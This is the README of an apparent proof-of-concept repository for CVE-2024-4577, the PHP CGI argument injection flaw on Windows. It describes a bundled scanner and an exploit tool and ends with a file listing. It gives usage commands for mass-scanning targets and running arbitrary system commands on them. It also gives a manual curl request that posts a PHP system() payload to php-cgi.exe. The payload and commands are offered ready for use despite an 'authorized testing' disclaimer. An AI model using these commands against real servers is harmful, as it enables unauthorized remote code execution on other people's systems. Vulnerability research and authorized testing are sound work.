# CVE-2024-4577 - PHP CGI Argument Injection RCE
## Summary
CVE-2024-4577 is a critical **PHP CGI argument injection vulnerability** that affects Windows systems running PHP in CGI mode. This flaw allows remote attackers to **inject arguments** into PHP's command line via specially crafted URLs, leading to **remote code execution (RCE)**.
This repository includes:
- `CVE-2024-4577.py`: A **scanner** to detect vulnerable targets.
- `exploit.py`: An **exploit tool** that sends PHP code and executes system commands on the vulnerable server.
> ⚠️ **DISCLAIMER**
> This project is for **educational and authorized testing** only. Any misuse of this code is not the responsibility of the author. Use responsibly and only in environments you own or have explicit permission to test.
---
## Requirements
- Python 3.x
- `requests` library
Install dependencies:
```bash
pip install -r requirements.txt
```
---
# Scanner Usage
Detect if a target is vulnerable to CVE-2024-4577:
## Single Target
```bash
python3 CVE-2024-4577.py -u http://target.com
```

## Multiple Targets from File
```bash
python3 CVE-2024-4577.py -f urls.txt
```

## Custom Path (optional)
```bash
python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php
```
### Example Vulnerable Paths
The scanner and exploit test common CGI endpoints like:
```bash
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello
```
The payload bypasses cgi.force_redirect and prepends malicious PHP using php://input.
---
# Exploit Usage
Execute arbitrary system commands on a vulnerable target:
## Single Target
```bash
python3 exploit.py -u http://target.com -c "id"
```

## Multiple Targets from File
```bash
python3 exploit.py -f urls.txt -c "id"
```

---
## Using curl
You can also exploit the vulnerability manually using curl
```bash
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"
```
This sends a PHP payload that executes uname -a on the server and returns the output.

---
# License
This code is released under the MIT License. See LICENSE for more information.
---
## Official Channels
- [YouTube @rootctf](https://www.youtube.com/@rootctf)
- [X @r0otk3r](https://x.com/r0otk3r)
[4.0K] /data/pocs/33066e9eb8b2977d0c2fdb473a7b409d1627da4d
├── [3.3K] CVE-2024-4577.py
├── [2.9K] exploit.py
├── [2.6K] README.md
└── [ 86] requirements.txt
0 directories, 4 files